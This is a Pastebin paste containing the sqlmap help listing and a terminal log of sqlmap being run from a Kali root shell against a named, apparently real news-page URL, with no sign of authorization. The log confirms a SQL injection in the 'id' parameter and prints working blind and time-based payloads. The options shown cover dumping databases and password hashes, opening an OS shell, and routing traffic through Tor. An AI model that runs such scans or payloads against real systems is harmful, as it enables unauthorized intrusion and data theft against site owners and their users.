Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Usage: python ./sqlmap [options]
- Options:
- -h, --help Show basic help message and exit
- -hh Show advanced help message and exit
- -v VERBOSE Verbosity level: 0-6 (default 1)
- Target:
- At least one of these options has to be specified to set the source to
- get target urls from
- -u URL, --url=URL Target url
- -g GOOGLEDORK Process Google dork results as target urls
- Request:
- These options can be used to specify how to connect to the target url
- --data=DATA Data string to be sent through POST
- --cookie=COOKIE HTTP Cookie header
- --random-agent Use randomly selected HTTP User-Agent header
- --proxy=PROXY Use a HTTP proxy to connect to the target url
- Injection:
- These options can be used to specify which parameters to test for,
- provide custom injection payloads and optional tampering scripts
- -p TESTPARAMETER Testable parameter(s)
- --dbms=DBMS Force back-end DBMS to this value
- Detection:
- These options can be used to specify how to parse and compare page
- content from HTTP responses when using blind SQL injection technique
- --level=LEVEL Level of tests to perform (1-5, default 1)
- --risk=RISK Risk of tests to perform (0-3, default 1)
- Techniques:
- These options can be used to tweak testing of specific SQL injection
- techniques
- --technique=TECH SQL injection techniques to test for (default
- "BEUSTQ")
- Enumeration:
- These options can be used to enumerate the back-end database
- management system information, structure and data contained in the
- tables. Moreover you can run your own SQL statements
- -a, --all Retrieve everything
- -b, --banner Retrieve DBMS banner
- --current-user Retrieve DBMS current user
- --current-db Retrieve DBMS current database
- --passwords Enumerate DBMS users password hashes
- --tables Enumerate DBMS database tables
- --columns Enumerate DBMS database table columns
- --schema Enumerate DBMS schema
- --dump Dump DBMS database table entries
- --dump-all Dump all DBMS databases tables entries
- -D DB DBMS database to enumerate
- -T TBL DBMS database table to enumerate
- -C COL DBMS database table column to enumerate
- Operating system access:
- These options can be used to access the back-end database management
- system underlying operating system
- --os-shell Prompt for an interactive operating system shell
- --os-pwn Prompt for an out-of-band shell, meterpreter or VNC
- General:
- These options can be used to set some general working parameters
- --batch Never ask for user input, use the default behaviour
- --check-tor Check to see if Tor is used properly
- --flush-session Flush session files for current target
- --tor Use Tor anonymity network
- Miscellaneous:
- --wizard Simple wizard interface for beginner users
- [!] to see full list of options run with '-hh'
- [*] shutting down at 12:15:11
- root@kali:~# sqlmap -u www.fabasket.com/noticia.php?id=1007 --dbs
- sqlmap/1.0-dev - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 12:15:29
- [12:15:29] [INFO] testing connection to the target url
- [12:15:30] [INFO] testing if the url is stable, wait a few seconds
- [12:15:32] [INFO] url is stable
- [12:15:32] [INFO] testing if GET parameter 'id' is dynamic
- [12:15:32] [INFO] confirming that GET parameter 'id' is dynamic
- [12:15:32] [INFO] GET parameter 'id' is dynamic
- [12:15:33] [INFO] heuristic (parsing) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
- [12:15:33] [INFO] testing for SQL injection on GET parameter 'id'
- heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
- do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] y
- [12:15:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [12:16:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [12:16:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
- [12:16:06] [WARNING] reflective value(s) found and filtering out
- [12:16:12] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
- [12:16:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
- [12:16:19] [INFO] GET parameter 'id' is 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)' injectable
- [12:16:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
- [12:16:19] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
- [12:16:19] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
- [12:16:19] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
- [12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
- [12:16:20] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
- [12:16:20] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
- [12:16:21] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
- [12:16:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
- [12:16:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
- [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
- [12:16:22] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
- [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
- [12:16:22] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
- [12:16:22] [INFO] testing 'MySQL inline queries'
- [12:16:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [12:16:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
- [12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [12:16:23] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
- [12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
- [12:16:23] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
- [12:16:23] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
- [12:16:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
- [12:16:24] [INFO] testing 'MySQL >= 5.0 time-based blind - Parameter replace'
- [12:16:25] [INFO] testing 'MySQL < 5.0 time-based blind - Parameter replace (heavy queries)'
- [12:16:25] [INFO] testing 'MySQL time-based blind - Parameter replace (bool*int)'
- [12:17:25] [INFO] GET parameter 'id' is 'MySQL time-based blind - Parameter replace (bool*int)' injectable
- [12:17:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [12:17:25] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
- [12:17:34] [INFO] target url appears to be UNION injectable with 1 columns
- [12:17:35] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. --dbms=mysql)
- [12:17:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
- [12:17:40] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
- [12:17:48] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
- [12:17:55] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
- [12:18:03] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
- [12:18:13] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
- [12:18:18] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
- [12:18:22] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
- [12:18:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
- [12:18:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
- GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
- sqlmap identified the following injection points with a total of 301 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
- Payload: id=MAKE_SET(3807=3807,1007)
- Type: AND/OR time-based blind
- Title: MySQL time-based blind - Parameter replace (bool*int)
- Payload: id=(1006=1006)*SLEEP(5)
- ---
- [12:18:48] [INFO] testing MySQL
- [12:18:48] [WARNING] the back-end DBMS is not MySQL
- [12:18:48] [INFO] testing Oracle
- [12:18:49] [WARNING] the back-end DBMS is not Oracle
- [12:18:49] [INFO] testing PostgreSQL
- [12:18:49] [WARNING] the back-end DBMS is not PostgreSQL
- [12:18:49] [INFO] testing Microsoft SQL Server
- [12:18:49] [WARNING] the back-end DBMS is not Microsoft SQL Server
- [12:18:49] [INFO] testing SQLite
- [12:18:49] [WARNING] the back-end DBMS is not SQLite
- [12:18:49] [INFO] testing Microsoft Access
- [12:18:49] [WARNING] the back-end DBMS is not Microsoft Access
- [12:18:49] [INFO] testing Firebird
- [12:18:49] [WARNING] the back-end DBMS is not Firebird
- [12:18:49] [INFO] testing SAP MaxDB
- [12:18:50] [WARNING] the back-end DBMS is not SAP MaxDB
- [12:18:50] [INFO] testing Sybase
- [12:18:50] [WARNING] the back-end DBMS is not Sybase
- [12:18:50] [INFO] testing IBM DB2
- [12:18:50] [WARNING] the back-end DBMS is not IBM DB2
- [12:18:50] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is MySQL. Do not specify the back-end DBMS manually, sqlmap will fingerprint the DBMS for you
- [*] shutting down at 12:18:50
- root@kali:~#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement